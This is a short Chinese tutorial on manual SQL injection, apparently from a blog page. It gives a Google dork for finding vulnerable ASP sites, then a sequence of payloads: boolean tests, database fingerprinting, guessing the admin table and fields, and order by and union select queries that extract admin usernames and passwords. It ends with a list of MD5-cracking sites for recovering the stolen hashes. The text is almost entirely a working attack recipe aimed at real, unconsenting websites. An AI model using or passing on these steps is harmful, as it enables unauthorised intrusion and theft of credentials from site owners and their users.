手工注入方法

手工注入方法:在谷歌里输入关键字:inurl:encomphonorbig.asp?id=
手工注入教程:
1、www.google.com.hk搜索:inurl:encomphonorbig.asp?id=
2、判断注入点:and 1=1   and 1=2   存在漏洞
3、判断数据库:'   ;   ;--   and len('a')=1  
4、猜表:and (select count(*) from admin),显示正常说明admin存在
5、猜字段: and (select count(username,password)from admin),显示正常说明username,password字段存在
6、order by 5
union select 1,2,3,4,5 from admin
看网页中显示第几位可用(此处如第三位可用)
union select 1,2,username,4,5 from admin
union select 1,2,password,4,5 from admin



MD5破解:

http://www.cmd5.com
http://xmd5.org
http://md5.syue.com
gttp://md5.com.cn
gttp://md5.asia


你可能感兴趣的:(手工注入)